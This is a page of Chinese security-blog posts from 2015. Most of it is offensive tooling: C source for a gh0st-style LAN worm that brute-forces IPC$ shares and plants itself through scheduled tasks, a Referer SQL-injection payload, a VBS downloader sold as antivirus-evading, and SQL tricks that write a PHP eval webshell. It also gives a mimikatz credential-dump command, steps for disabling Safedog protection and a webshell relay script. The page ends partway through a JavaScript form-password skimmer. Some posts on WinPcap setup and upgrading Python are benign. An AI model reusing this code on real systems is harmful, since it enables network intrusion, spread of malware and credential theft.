提权函数之RtlAdjustPrivilege()

发布时间:April 26, 2015 // 分类:工作日志,VC/C/C++,代码学习,转帖文章,windows // No Comments

RtlAdjustPrivilege() 这玩意是在 NTDLL.DLL 里的一个不为人知的函数,MS没有公开,原因就是这玩意实在是太NB了,以至于不需要任何其他函数的帮助,仅凭这一个函数就可以获得进程ACL的任意权限!
下面是函数定义:

NTSTATUS RtlAdjustPrivilege
(
ULONG    Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
)

参数的含义:
Privilege [In] Privilege index to change.                         
// 所需要的权限名称,可以到MSDN查找关于Process Token & Privilege内容可以查到

Enable [In] If TRUE, then enable the privilege otherwise disable. 
// 如果为True 就是打开相应权限,如果为False 则是关闭相应权限

CurrentThread [In] If TRUE, then enable in calling thread, otherwise process. 
// 如果为True 则仅提升当前线程权限,否则提升整个进程的权限

Enabled [Out] Whether privilege was previously enabled or disabled.
// 输出原来相应权限的状态(打开 | 关闭)

用法很简单:

#define SE_DEBUG_PRIVILEGE 0x14 //DEBUG 权限
int s;
RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE,true,false,&s);

 

VC6.0下Winpcap 环境部署

发布时间:April 26, 2015 // 分类:工作日志,VC/C/C++,代码学习,windows // No Comments

winpcap提供两个不同级别的编程接口:一个基于libpcap的wpcap.dll,另一个是较为底层的packet.dll,对于一般的要与Unix平台的Libpcap兼容的开发者来说,使用wpcap.dll是当然的选择。

初次编译时会遇到问题:“无法打开pcap.h”。解决方法:

1.安装winpcap驱动。下载地址

2.配置开发包WpdPack。下载地址

其中的WinPcap直接安装;WpdPack则是解压,头文件直接放vc的include下或者是单独放置。

2.打开VC,工具-》选项-》目录,将winpcap的include,lib目录添加进VC6.0的环境变量

LIB目录则是这样

然后选择具体的项目,工程--设置。在C++里面。在“预处理程序定义”下加上WPCAP,HAVE_REMOTE,注意它们之间用逗号隔开

 

 

然后在“对象/库模块”下加入wpcap.lib Packet.lib 注意这个地方每个之间用空格隔开

SQL注入(Rerferer注入)插件编写

发布时间:April 26, 2015 // 分类:代码学习,VC/C/C++,windows,python // No Comments

这个漏洞的详细细节在这里可以看到:http://0day5.com/archives/319

首先是python的,因为学习python,所以就选择了这个。首先自己定义一个http头,然后curl -H提交就好了

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#from:http://0day5.com/archives/319

def assign(service,arg):
    if service == "phpcms":
        return True, arg

def audit(arg):
    url = arg + '/index.php?m=poster&c=index&a=poster_click&id=1'
    payload = "Referer:',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')#"
    code, head, res, errcode,finalurl =  curl.curl("-H \"%s\" %s" % (payload,url))

    if code == 200 and res.find("for key 'group_key'") != -1:
        security_hole(url)

if __name__ == "__main__":
    from dummy import *
    audit(assign('phpcms', 'http://www.example.com/')[1])

然后是VC的,因为之前没有考虑到http头也可以注入的问题。所以只能采取拼凑的办法,就是把需要提交的参数直接封装到一个包里面去。然后直接发送出去

    String referPack="";  //顶一个referPack
    referPack.Format("GET %s/index.php?m=poster&c=index&a=poster_click&id=1 HTTP/1.1\r\nHost: %s\r\nUser-Agent: baiduSpider\r\nReferer:',(SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a),'1')#"
        ,Root,Host);//就是定义了一个referer,然后把GET提交的东西封起来
    sendToTarget(referPack.GetBuffer(0),TRUE);//发送出去
    String body=GetResponseContent(); //接收返回的内容
    if (body.Find("for key 'group_key'",0)!=-1)
    {
        return "http://"+Host+Root+"/index.php?m=poster&c=index&a=poster_click&id=1 存在Referer MySQL显错式注入!";
    }

 

gh0st学习之内网感染模块

发布时间:April 26, 2015 // 分类:VC/C/C++,windows // No Comments

char *GetMyFilePath();
DWORD SendFiles(const char *RemoteIP,const char *lpUserName,const char *lpPassword);
//----------------------------------------------------------------
typedef DWORD(WINAPI*tWNetAddConnection2)
(
 LPNETRESOURCE lpNetResource,      // connection details
 LPCTSTR      lpPassword,           // 密码
 LPCTSTR       lpUsername,           // 用户名
 DWORD         dwFlags               // 连接选项
);
//----------------------------------------------------------------
int InitWSA()
{
    WORD wVersion =0 ;
    int  errret = -1;
    WSADATA wsaData;
    wVersion = MAKEWORD(2,2);
    errret = WSAStartup(wVersion,&wsaData);
    if( LOBYTE( wsaData.wVersion) != 2 ||
        HIBYTE( wsaData.wVersion) !=2 )
    {
        return 0;
    }
    return 1;
}
 
 
 
 
int nCount;
int breakipc=0;
 
//--------------------------------------------------------------------------------------------
 
DWORD WINAPI IPC(LPVOID lpParameter)  //IPC内网传播
{
    //要进入的用户名
char *szUser[]={                          
"administrator","test","admin", "guest","alex", "home",
"love","xp", "user","game", "123","nn","root",
"movie","time", "yeah","money", "xpuser","hack","enter",
0};
        //要进入的密码
char *szPass[]={
"", 
"password","111","123456","qwerty","test","abc123", "memory",
"home", "12345678","love","bbbbbb","xp", "88888","nn","root","caonima",
"5201314", "1314520","asdfgh","alex", "angel","NULL",
"123", "asdf","baby","woaini", "movie",
0};
//---------------------------------
if(!InitWSA()) //初始化套接字
return 0;
CHAR szHostName[128]={0};   //定义主机名的变量   
struct hostent * pHost;      
int b;                      //定义变量i
SOCKADDR_IN saddr;
             
if(gethostname(szHostName,128)==0) //获取本机计算机名
{        
pHost = gethostbyname(szHostName); //根据计算机名获取IP地址等信息
for(b = 0; pHost!= NULL && pHost->h_addr_list[b]!= NULL; b++ )     
{   
memset(&saddr,0,sizeof(saddr)); 
memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[b], pHost->h_length);         
char szIpaddress[128]={0};
 
for(nCount=1;nCount<254;nCount++)  //C段1-254   
{
    breakipc=0;
memset(szIpaddress,0,128);
sprintf(szIpaddress,               //格式化IP到szIpaddress变量
        "%d.%d.%d.%d",
        saddr.sin_addr.S_un.S_un_b.s_b1,
        saddr.sin_addr.S_un.S_un_b.s_b2,
        saddr.sin_addr.S_un.S_un_b.s_b3,
nCount);
//printf("%s\n",szIpaddress);
for(int i = 0;szUser[i]; i++)      //进行循环从szUser变量中0的位置循环用户名
{
for (int j=0;szPass[j];j++)           //进行循环从szPass变量中0的位置循环密码
{
Sleep(200); 
if (breakipc==1)
{
    break;
}
                        //暂停80毫秒
SendFiles(szIpaddress,szUser[i],szPass[j]); //传递远程主机IP用户名和密码进行种植
//printf("%s\n%s\n%s\n",szIpaddress,szUser[i],szPass[j]);
}           
} 
}
                     
}
}   
WSACleanup();   
return 1;
}
 
//--------------------------------------------------------------------------------------------
 
DWORD SendFiles(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
HMODULE hModuleMpr=LoadLibrary("mpr.dll");   //加载网络通信的mpr.dll动态链接库
tWNetAddConnection2 connectipc=(tWNetAddConnection2)GetProcAddress(hModuleMpr,"WNetAddConnection2A");
 
char sPwd[20]={0};
memset(sPwd, 0, 20);
if(!lstrcmp(lpPassword, "NULL"))
sprintf(sPwd, "\"%s\"","");
 
char szCmdLine[1028]={0};
char szIpcFilePath[MAX_PATH]={0};
sprintf(szCmdLine,"\\\\%s\\ipc$",RemoteIP);
NETRESOURCE ns;
ns.dwScope=RESOURCE_GLOBALNET;
ns.dwType=RESOURCETYPE_ANY; 
ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC; 
ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;
ns.lpLocalName="";
ns.lpRemoteName=szCmdLine;
ns.lpProvider=NULL;
ns.lpComment=NULL;
BOOL bRet=TRUE;
DWORD dwRet;
dwRet=connectipc(&ns,lpPassword,lpUserName,0);
 
if (connectipc)
{
 
    char *szMyFilePath=GetMyFilePath();
    Sleep(200);
    memset(szCmdLine,0,1028);
    sprintf(szCmdLine,"\\\\%s\\admin$\\NewArea.exe",RemoteIP);
    lstrcpy(szIpcFilePath,"admin$\\");
    bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
    if(!bRet)
    {
        memset(szCmdLine,0,1028);
        sprintf(szCmdLine,"\\\\%s\\C$\\NewArean.exe",RemoteIP);
        lstrcpy(szIpcFilePath,"C:\\NewArea.exe");
        bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
        if(!bRet)
        {
            memset(szCmdLine,0,1028);
            sprintf(szCmdLine,"\\\\%s\\D$\\NewArea.exe",RemoteIP);
            lstrcpy(szIpcFilePath,"D:\\NewArea.exe");
            bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
             
            if(!bRet)
            {
                memset(szCmdLine,0,1028);
                sprintf(szCmdLine,"\\\\%s\\E$\\NewArea.exe",RemoteIP);
                lstrcpy(szIpcFilePath,"E:\\NewArea.exe");
                bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
                if(!bRet)
                {
                    memset(szCmdLine,0,1028);
                    sprintf(szCmdLine,"\\\\%s\\F$\\NewArea.exe",RemoteIP);
                    lstrcpy(szIpcFilePath,"F:\\NewArea.exe");
                    bRet=CopyFile(GetMyFilePath(),szCmdLine,FALSE);
                    return 0;
                }
            }
        }
    }
    if(bRet)
    {
        SYSTEMTIME sYstemTime;
        GetLocalTime(&sYstemTime);
        memset(szCmdLine,0,1028);
        sprintf(szCmdLine,"at \\\\%s %d:%d %s",RemoteIP,sYstemTime.wHour,sYstemTime.wMinute+2,szIpcFilePath);
        WinExec(szCmdLine,SW_HIDE);
        breakipc=1;
        Sleep(2000);
    }
    return 0;
}
 
     
return 1;
     
}
 
//-----------------------------------------------------------------------------
char *GetMyFilePath()  //得到自身路径函数
{
char szMyFilePath[MAX_PATH]={0};
GetModuleFileName(NULL,szMyFilePath,MAX_PATH);
return szMyFilePath;
}

 

一些有意思的玩意

发布时间:April 26, 2015 // 分类:运维工作 // No Comments

1.dedecms绕过非审核会员机制

/member/index_do.php?fmdo=user&dopost=regnew&step=2 

注册后直接访问 "完善资料" 的url,"完善"一下就激活了。

2.msf转发上线

中转IP上运行

lcx -listen 1433 3306

KALI里面运行

use multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set LPORT 3306
set RHOST x.x.x.171
exploit

原理就是利用中转服务器对数据进行对接

3.一个免杀的WGET.vbs

iLocal = LCase(WScript.Arguments(1))   
iRemote = LCase(WScript.Arguments(0)) 
Set testPost = CreateObject("Microsoft.XMLHTTP") 
testPost.Open "GET",iRemote,0 
testPost.Send() 
Set sGet = CreateObject("ADODB.Stream") 
sGet.Mode = 3 
sGet.Type = 1 
sGet.Open() 
sGet.Write(testPost.responseBody) 
sGet.SaveToFile iLocal,2

它的原型

echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs

使用方法:cascript iget.vbs url save filename

4.SQL Injection 在 ORDER BY 內使用 into outfile

在 ORDER BY 后不能使用 UNION

除了可以使用

LINES TERMINATED BY 0x41414141

來定义Webshell 外还可以使用

select user() from login order by if(( select 'abc' into outfile '/tmp/1.php'),1,1);

來导出 Webshell

在limit后还可以这样使用

select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xxx limit 1 into outfile 'C:/shell.php'

如果受到单引号等的影响,可以考虑如下的办法

set @a=0x73656C6563742030783343334637303638373032303430363537363631364332383234354635303446353335343542323736333644363432373544323933423346334520696E746F206F757466696C652027433A2F7368656C6C2E70687027;
prepare cmd from @a;
execute cmd;

其原型如下

set @a=select <?php @eval($_POST['cmd']);?> into outfile 'C:/shell.php';
prepare cmd from @a;
execute cmd;

5.在msql sqlserver里边怎么快速找到带有关键字的表

sql server 全部库:

declare @i int,@id int,@dbname varchar(255),@sql varchar(255)
    set @i = 6
    set @id=(select count(*) from master..sysdatabases)

drop table #t
create table #t (
    dbname varchar(255),
    tablename varchar(255),
    columnname varchar(255)
)

while (@i < @id)
    begin
        set @i = @i + 1;
        set @dbname = (select name from master..sysdatabases where dbid= @i)
        set @sql = 'use '+ @dbname+';insert [#t] select table_catalog,table_name,column_name from information_schema.columns where column_name like ''%pass%'' or column_name like ''%pwd%'' or column_name like ''%mail%'''
        exec (@sql)
        --print @sql
    end

select * from #t
drop table #t

go

sql server单个库:

SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');

mysql:

select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');

6.wireshark使用的时候wincap报错.

unable to load winpcap(wpcap.dll); wireshark will not be able to capture packets.
解决办法:
因为npptools.dll这个权限被去掉了,重新分配一下权限就可以了。如果修改权限还是不行。就表示文件被破坏掉了

Unable to load WinPcap (wpcap.dll); Wireshark will no be able to capture packets.
Fix:

The NPF driver isn't running.
Fix: from elevated command prompt: net start npf

Notes: 
The problem is only with the 64-bit version of Wireshark.
wireshark-win32-1.2.0.exe installs and works fine on both Windows 7 x86 and x64. 
Network Monitor 3.3 x64 is installed and works.

7.关于文件下载

Bitsadmin File Download

Bitsadmin是Windows命令行工具,用户可以使用它来创建下载或上传的任务。

bitsadmin /transfer n http://domain/file c:\%homepath%\file

还有一个certutil

certutil -urlcache -split -f http://www.baidu.com/1.rar

8.mimikatz不反弹读取密码.

有些时候无法反弹shell执行mimikatz,虽然可以用procdump导出lsass的内存dump文件,之后本地获取明文密码,但多少有点麻烦,其实mimikatz也支持命令行直接导出

mimikatz.exe privilege::debug "log filename.log" sekurlsa::logonpasswords token::elevate lsadump::sam lsadump::secrets exit

9.内网里的无工具扫描

内网C段存活主机查找,这条来自核大很早以前的回帖

for /l %i in (1,1,255) do @ping 10.0.1.%i -w 1 -n 1 | find /i "ttl"

通过上面一条,加上我在内网玩的经验,延伸出了下面这条,是用来找主机名的

for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"

再从上面一条,延伸出了B段查找,因为在一个内网里面有时候不一定只有一个域,而当两个域没有信任时,可以用这条扫出来

for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"

这条也是核攻击大牛发的,是用来找域机器对应IP的

FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)

10.安全狗开启各种保护,突破方法:首先在Shell下把安全猪的安装配置给下来 默认安装路径:

C:\Program Files\SafedogServer\SafeDogGuardCenter\Config\DirDefend.xml
导入本地的安全服务器安全狗查看    主动防御 - 文件及目录保护  查看是否开启各种保护。如果开启了,直接关掉。然后再把DirDefend.xml替换到远程服务器上去,重启服务器,各种操作。如果还开启了密码保护,打开注册表 regedit ,找到HKEY_LOCAL_MACHINE\SOFTWARE\Safedog\SafedogSR 删除SafedogSR 即可突破安全猪密码保护。

11.报错注入中读文件找路径太慢,折腾了一个一条语句查找web路径的sql语句

select substring_index(replace(load_file('/etc/apache2/sites-enabled/000-default.conf'),substring_index(load_file('/etc/apache2/sites-enabled/000-default.conf'),'DocumentRoot',1),''),'\n',1) as test;

 

linux升级python

发布时间:April 26, 2015 // 分类:工作日志,运维工作,linux // No Comments

最近对一批闲置的服务器进行维护,期间使用到python脚本来批量进行操作,可是发现python版本过低。于是对python版本进行升级

1.下载Pyhon,选择下载Gzipped source tar ball (2.7.3) (sig)

wget http://python.org/ftp/python/2.7.3/Python-2.7.3.tar.bz2

2.解压安装,命令如下

tar -xvf Python-2.7.3.tar.bz2
cd Python-2.7.3
./configure --prefix=/usr/local/python2.7
make
make install
make clean
make distclean

3.创建链接来使系统默认python变为python2.7

ln -fs /usr/local/python2.7/bin/python2.7 /usr/bin/python

4.查看Python版本

python –V

5.修改yum配置(否则yum无法正常运行)

vi /usr/bin/yum

将第一行的

#!/usr/bin/python

修改为系统原有的python版本地址

#!/usr/bin/python2.6

PS:

1.在执行./configure时,出现报错信息configure: error: no acceptable C compiler found in $PATH

解决方法:    yum install gcc -y

2.在make的时候提示我

Failed to build these modules:
_sqlite3 

在网上查了一下解决办法:编辑源码下的connection.c这个文件

vi Python-2.7.3/Modules/_sqlite/connection.c

#include "cache.h"
#include "module.h"
#include "connection.h"
#include "statement.h"
#include "cursor.h"
#include "prepare_protocol.h"
#include "util.h"
#include "sqlitecompat.h"
#include "pythread.h"
#define ACTION_FINALIZE 1
#define ACTION_RESET 2
#if SQLITE_VERSION_NUMBER >= 3003008
#ifndef SQLITE_OMIT_LOAD_EXTENSION
#define HAVE_LOAD_EXTENSION
#endif
#endif

下面添加上

#ifdef SQLITE_INT64_TYPE
typedef SQLITE_INT64_TYPE sqlite_int64;
typedef unsigned SQLITE_INT64_TYPE sqlite_uint64;
#elif defined(_MSC_VER) || defined(__BORLANDC__)
typedef __int64 sqlite_int64;
typedef unsigned __int64 sqlite_uint64;
#else
typedef long long int sqlite_int64;
typedef unsigned long long int sqlite_uint64;
#endif
typedef sqlite_int64 sqlite3_int64;
typedef sqlite_uint64 sqlite3_uint64;

再次make,没有报错。

PHP中转访问脚本

发布时间:April 26, 2015 // 分类:PHP,linux,windows // No Comments

<?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 
 
$url = "http://blog.discuz.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; //supsite 注入页面
 
echo $url;
 
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
 
$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>

将这个文件保存成inj.php即可,这个文件url如下:

http://localhost/inj/inj.php

把需要访问的$id根据目标页的伪静态规则放到指定的位置就可以了。如上。

原理就是通过curl来取得目标页的内容(与直接访问目标页效果一样),只需要修改$url的内容就可以适应各种伪静态规则了。

脚本比较简陋,有需要的童鞋,可根据情况加入post方式,代理,referer等功能。

我们现在访问 http://localhost/inj/inj.php?id=1,

即相当于访问 http://localhost/inj/index.php/index/index/id/1.html ,

呵呵,现在我们就可以通过访问 http://localhost/inj/inj.php?id=1 这个连接访问ado服务器的相关页面了。顺便淘到了一个POST的中转的

<?php 
$webshell="http://www.phpinfo.me/plus/helen.php";//把这里改成你的shell地址 
$webshell=$webshell."?&1141056911=base64_decode"; 
 
$da=$_POST; 
$data = $da; 
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); //接收菜刀的post,并把base64_decode替换成$_GET[1141056911]( 
 
//print_r($data); 
 
$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
    
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post   
echo $html;   
 
 
?>

 

VC之爬虫bugscan

发布时间:April 26, 2015 // 分类:VC/C/C++,windows // No Comments

最近学习python,昨晚折腾到半夜。今天想起来也是醉了.

然后今儿拿VC来重新写了一个

//从用户提供的url  www.bugscan.net/bug/111  中获取 漏洞id
    CRegex reid("www.bugscan.net/bug/(\\d+)");
    reid.RegMatch(target);
 
 
    CBaseSec bugscan("https://www.bugscan.net");
    bugscan.init();
     
    //设置http请求头部
    bugscan.SetContentType("application/json; charset=UTF-8");
    bugscan.SetHttpHeader("Referer: https://www.bugscan.net/");
    bugscan.SetCookie("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
     
     
    //发送获取漏洞信息的请求
    CString postdata="{\"method\":\"GetPluginDetail\",\"params\":["+reid.strMat+"]}";
    bugscan.PostRequest("/rest",postdata.GetBuffer(0),TRUE);
 
    //获取漏洞描述
    CString desc=bugscan.getInfo("\"description\":\"(.*?)\"");
    if (desc=="")
    {
        //无漏洞描述,视此漏洞id无效
        return "";
    }
    //获取漏洞的fname
    CString fname=bugscan.getInfo("\"fname\":\"(.*?)\"");
    //获取源码
    CString source=bugscan.getInfo("\"source\":\"(.*?)\",\"status");
    source.Replace("\\\"","\"");
 
 
    //将源码写入到文件
    CString filename="";
    filename.Format("%s-%s",reid.strMat,fname);
    CStdioFile logtxt(filename,CFile::modeReadWrite | CFile::shareDenyNone | CFile::typeText | CFile::modeCreate | CFile::modeNoTruncate);
    logtxt.SeekToEnd();
    //要写入的数据
    CString data="";
    data="#"+desc+"\n\n"+source;
    data.Replace("\\r","\r");
    data.Replace("\\n","\n");
    logtxt.WriteString(data);

python之bugscan爬虫

发布时间:April 26, 2015 // 分类:代码学习,linux,python,windows // No Comments

最近在bugscan上提交各种插件,发现了与很多大神之间的差距。但是自己想弄一些回来慢慢的学习。就萌生了想把全部的explotit全部拖回来看看。

首先我们来抓包看看

POST /rest HTTP/1.1
Host: www.bugscan.net
Connection: keep-alive
Content-Length: 45
Origin: https://www.bugscan.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://www.bugscan.net/
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
{"method":"GetPluginDetail","params":[579]}

可以看出来是通过json进行提交的

然后我们用这个数据包利用burp来重放一次

明显是可以看到成功提交的。然后各种精简到后来发现到这样也是可以提交的

POST /rest HTTP/1.1
Host: www.bugscan.net
Content-Type: application/json;charset=UTF-8
Referer: https://www.bugscan.net/
Cookie: xxxxxxxxxxxxxxxxxxxxxx
Content-Length: 45
 
{"method":"GetPluginDetail","params":[579]}

那么现在可以明确的肯定,我们需要提交的东西包括host url referer content-type cookie 以及 post提交的数据

首先因为要使用json,我们就加载json模块

我们使用urllib2这个组件来抓取网页。

urllib2是Python的一个获取URLs(Uniform Resource Locators)的组件。

它以urlopen函数的形式提供了一个非常简单的接口

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: rookie
 
import json   
import urllib2
 
url = ' #接收参数的地址 
headers = { 'Referer':' #模拟来路 
            'Content-Type': 'application/json;charset=UTF-8', #提交的方式
            'cookie':'xxxxxxxxxxxxxxxxx'  #自己的cookie
        }
data = {"method":"GetPluginDetail","params":[579]}
postdata = json.dumps(data)
 
req = urllib2.Request(url, postdata, headers)
response = urllib2.urlopen(req)
the_page = response.read()
print the_page

可以看到现在成功的获取到了这个内容.

然后逐个匹配,内容,文件名字等等

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: rookie
 
import json   
import urllib2
 
url = ' #接收参数的地址  
headers = { 'Referer':'https://www.bugscan.net/',#模拟来路
            'Content-Type': 'application/json;charset=UTF-8',#提交的方式
            'cookie':'xxxxxxxxxxxxxxxxxxxxxxxxxxx'#自己的cookie
        }
data = {"method":"GetPluginDetail","params":[579]}
postdata = json.dumps(data)
 
req = urllib2.Request(url, postdata, headers)
response = urllib2.urlopen(req)
html_page = response.read()
json_html = json.loads(html_page) #dedao得到原始的数据
source = json_html['result']['plugin']['source'] #获取到我们需要的源码内容
name = json_html['result']['plugin']['fname'] #获取到我们读取的文件名字
f = open('f:/bugscan/'+name,'w')
f.write(source)
f.close()

然后就是我们想要做的了..

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: rookie
 
import json   
import urllib2
 
url = 'https://www.bugscan.net/rest'
headers = { 'Referer':'https://www.bugscan.net/',
            'Content-Type': 'application/json;charset=UTF-8',
            'cookie':'xxxxxxxxxxxxxxxxxxxxxxxxxxx'
        }
for i in range(1, 579+1): #因为到当前为止,只有579篇
    datas = {"method":"GetPluginDetail","params":[i]}
    postdata = json.dumps(datas)
    req = urllib2.Request(url, postdata, headers)
    response = urllib2.urlopen(req)
    html_page = response.read()
    json_html = json.loads(html_page) #dedao得到原始的数据
    source = json_html['result']['plugin']['source'] #获取到我们需要的源码内容
    name = json_html['result']['plugin']['fname'] #获取到我们读取的文件名字
    f = open('f:/bugscan/'+i+name,'w')#写入文件内
    f.write(source)
    f.close()

下一个修改的地方,因为用户Zero的是不能查看的,所以考虑获取用户的地方直接给他不写入

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: rookie
 
import json   
import urllib2
 
url = 'https://www.bugscan.net/rest'
headers = { 'Referer':'https://www.bugscan.net/',
            'Content-Type': 'application/json;charset=UTF-8',
            'cookie':'xxxxxxxxxxxxxxxxxxxxxx'
        }
for i in range(1, 579+1):
    datas = {"method":"GetPluginDetail","params":[i]}
    postdata = json.dumps(datas)
    req = urllib2.Request(url, postdata, headers)
    response = urllib2.urlopen(req)
    html_page = response.read()
    if html_page.find('未登录或者是加密插件') == -1: #未登录或者是加密插件的基本不可看
        json_html = json.loads(html_page) #dedao得到原始的数据
        source = json_html['result']['plugin']['source'] #获取到我们需要的源码内容
        name = json_html['result']['plugin']['fname'] #获取到我们读取的文件名字
        f = open('f:/bugscan/'+i+name,'w')
        f.write(source)
        f.close()
 

2015.8.15更新

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: rookie
  
import json   
import urllib2
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
  
url = 'https://www.bugscan.net/rest'
#自定义的http头
headers = { 'Referer':'https://www.bugscan.net/',
            'Content-Type': 'application/json;charset=UTF-8',
            'cookie':'here is cookie which is yours'
        }

for i in range(39, 1341+1):
    #自带的提交方式
    data = {"method":"GetPluginDetail","params":[i]}
    #把提交得到的数据进行json解码
    postdata = json.dumps(data)
    req = urllib2.Request(url, postdata, headers)
    response = urllib2.urlopen(req)
    html_page = response.read()
    json_html = json.loads(html_page)
    #如果匹配到sql:no rows in result set
    #表示这个是不可读取的
    if html_page.find("sql: no rows in result set") == -1: 
        #如果匹配到了source:的式样。则进行匹配
        if html_page.find('"source":') != -1: 
            #print i
            #抓取source的内容
            source = json_html['result']['plugin']['source']
            #抓取fname的内容,也就是提交的文件名
            name = json_html['result']['plugin']['fname']
            #考虑到有重复的出现,这里匹配了i
            f = open('bugscan/'+bytes(i)+'_'+name,'w')
            f.write(source)
            f.close()

 

2016/1/16 更新。因为之前的跳转全部给弄到了q.bugscan.net。所以单独对q.bugscan.net的进行爬行

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests,re

#自定义的http头
qian = re.compile(r'<pre><code>([\s\S]*?)</code></pre>')
headers = { 'Referer':'http://q.bugscan.net/',
            'UserAgent': 'Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19',
            'cookie':'cookie',}
url = 'http://q.bugscan.net/t/1945'
response = requests.get(url,headers=headers)
resu = qian.findall(response.content.replace('&#34;', '"'))
if (len(resu)>0) and ("def assign(service, arg):" in resu):
    content = resu[0].replace("&#39;", "'")
        print content

然后按照这个弄了一个多线程的

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: rookie
import requests,re
import time
import thread

def scan(i):
    print i
    qian = re.compile(r'<pre><code>([\s\S]*?)</code></pre>')
    headers = { 'Referer':'http://q.bugscan.net/',
            'UserAgent': 'Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19',
            'cookie':'CNZZDATA1256927980=200621908-1450077676-http%253A%252F%252Fq.bugscan.net%252F%7C1450106517; gsid=a8971c8ce53bc573809080eb34e7b03d88ed0dcfb733f1c48aceeeb1b6c8c574; _xsrf=2|1f20d955|cd1c41b6601fd0225ea5c8641af3028c|1451976836',}
    url = 'http://q.bugscan.net/t/'+str(i)
    response = requests.get(url,headers=headers)
    resu = qian.findall(response.content.replace('&#34;', '"'))
    if (len(resu)>0) and ("def assign(service, arg):" in resu):
        content = resu[0].replace("&#39;", "'")
        content = content.replace('&gt;','>')
        content = content.replace('&lt;','<')
        content = content.replace('&amp;','&')
        f = open('bugscan/'+bytes(i)+".py",'w')
        f.write(content)
        f.close()

def find_id():
    for i in range(1,2187+1):
        thread.start_new_thread(scan, (i,))
        time.sleep(3)

if __name__ == "__main__":
    find_id()

js通用截获form密码代码

发布时间:April 26, 2015 // 分类:运维工作,PHP,代码学习 // No Comments

功能:
<form method="POST">(整个表单里如果没找到<input type="password">的框框则不截获,如果找到则截获所有input里的value。)</form>

/***************
通用截获form密码
IE, chrome通过测试
作者 Spider
****************/

function Send_Data(url,ref,datas) {
        var xmlhttp = false;
        //更高效地获取XMLhttp对象
        if(window.XMLHttpRequest) {
                xmlhttp = new XMLHttpRequest();
                if(xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); }
        } else if(window.ActiveXObject) {
                var xmlobj = ['Microsoft.XMLHTTP','MSXML.XMLHTTP','Msxml2.XMLHTTP.8.0','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'];
                for(var i = 0;i < xmlobj.length;i++) { try { xmlhttp = new ActiveXObject(xmlobj[i]); } catch(e) {} }
        }
        if(!xmlhttp) { return false; }
        //接收截获数据地址(跨域方法百度找)
